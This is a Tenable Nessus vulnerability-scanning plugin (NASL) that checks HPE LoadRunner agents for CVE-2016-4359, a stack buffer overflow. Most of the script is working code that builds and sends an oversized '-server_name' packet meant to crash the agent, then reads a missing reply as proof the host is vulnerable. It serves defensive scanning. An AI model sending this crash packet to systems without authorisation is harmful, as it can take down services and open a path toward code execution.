HPE LoadRunner Shared Memory Name Construction RCE

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(91972);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2016-4359");
  script_xref(name:"ZDI", value:"ZDI-16-363");
  script_xref(name:"HP", value:"HPSBGN03609");
  script_xref(name:"HP", value:"PSRT110020");
  script_xref(name:"HP", value:"emr_na-c05157423");
  script_xref(name:"TRA", value:"TRA-2016-16");

  script_name(english:"HPE LoadRunner Shared Memory Name Construction RCE");

  script_set_attribute(attribute:"synopsis", value:
"A software performance testing application running on the remote host
is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Hewlett Packard Enterprise (HPE) LoadRunner application running
on the remote host is affected by a stack-based buffer overflow
condition in mchan.dll, when constructing a shared memory file name,
due to improper validation of the size of a user-supplied string. An
unauthenticated, remote attacker can exploit this, via a long
'-server_name' value, to execute arbitrary code with the privileges of
the user running the application.

Note that LoadRunner reportedly is affected by other vulnerabilities,
which can result in a denial of service; however, Nessus has not
tested for these.");
  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05157423
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1dac9898");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch or upgrade according to the vendor
advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-4359");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/07");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("loadrunner_agent_detect.nasl", "os_fingerprint.nasl");
  script_require_ports("Services/loadrunner_agent", 54345);

  exit(0);
}

include('audit.inc');
include('byte_func.inc');
include('global_settings.inc');
include('misc_func.inc');
include('dump.inc');

function mkdword_be()
{
  local_var v;

  v = _FCT_ANON_ARGS[0];

  return mkdword(v, order: BYTE_ORDER_BIG_ENDIAN);             
} 

function block(data, len, inclusive)
{
  if(isnull(len))
  {
    len = strlen(data); 
    if(inclusive)
      len += 4;
  } 
  return (mkdword_be(len) + data);
} 

function xdr_string(s, len)
{
 
  # Allow user to generate a malformed xdr_string 
  if(! isnull(len))
    return block(data:s, len:len);

  s = block(data:s);
  # pad to 4 byte boundary 
  s += crap(data:'\x00', length: (4 - strlen(s) % 4) % 4);
 
  return s; 
}


#
# MAIN
#

# It looks like only the Windows version is affected.
# If OS cannot be determined, proceed with the attack. 
os = get_kb_item('Host/OS');
if (os && 'Windows' >!< os)
  audit(AUDIT_OS_NOT, 'Windows');

# Make sure LoadRunner agent is detected 
port = get_service(svc:'loadrunner_agent', exit_on_fail:TRUE);

# Attack is known to work on ENCAPS_IP, may also work on SSL.
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');  


#
# Build the attack request
#
guid = base64(str:rand_str(length:16));
blk1 = block(data: guid +"0");

# Message header
hdr =  mkdword_be(0x0d) +             
       mkdword_be(0x01) +             
       crap(data:'X',length:16) +
       mkdword_be(0x00);              

# Max size: 0x400 bytes 
conn_str = "(-server_type=2)" +
           "(-server_name=" + crap(data:'A', length:0x380) + ")";

# Message body 
body  = mkdword_be(0x06)+                     
        xdr_string(s:conn_str) + 
        mkdword_be(0x7530);

hdr   = block(data:hdr, inclusive: TRUE);
body  = block(data:body, inclusive: TRUE);
msg   = block(data:hdr + body);
req   = blk1 + msg;

send(socket:soc, data:req);

# Do not close socket right after the send.
# Doing so can prevent the remote service from 
# processing the attack packet.
res = recv(socket:soc, length:4096);
close(soc);

# Windows Error Report can pop up and the Agent process/service is 
# not totally dead. It still can accept TCP connections.
# We try to run the LR agent protocol to get something back.
# A vulnerable service will not respond while a patched one will.
res = NULL;
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (soc)  
{
  pid = rand() % 0xffff;
  tid = rand() % 0xffff;
  server_name = "nessus";
  server_ip = compat::this_host();
  server_port = get_source_port(soc); 
  conn_str = "(-server_type=8)" +
         "(-server_name=" + server_name + ")" +
         "(-server_full_name=" + server_name + ")" +
         "(-server_ip_name=" + server_ip + ")" +
         "(-server_port=" + server_port + ")" +
         "(-server_fd_secondary=4)" +
         "(-guid_identifier=" + guid + ")";

  body  = mkdword_be(0x0f)+                    
          xdr_string(s: server_name + ";" + pid + ";" + tid) +
          xdr_string(s:conn_str) + 
          mkdword_be(0x7530) +
          mkdword_be(0x8);
  body  = block(data:body, inclusive: TRUE);
  msg   = block(data:hdr + body);
  req2   = blk1 + msg;

  send(socket:soc, data:req2);
  res = recv(socket:soc, length:4096);
  close(soc);
}
if(res)
{
  audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner Agent', port);
}
# Failed to connect or get a response
else
{
  security_report_v4(
    port:       port,
    severity:   SECURITY_HOLE,
    generic:    TRUE,
    request:    make_list(hexdump(ddata:req))
  );
}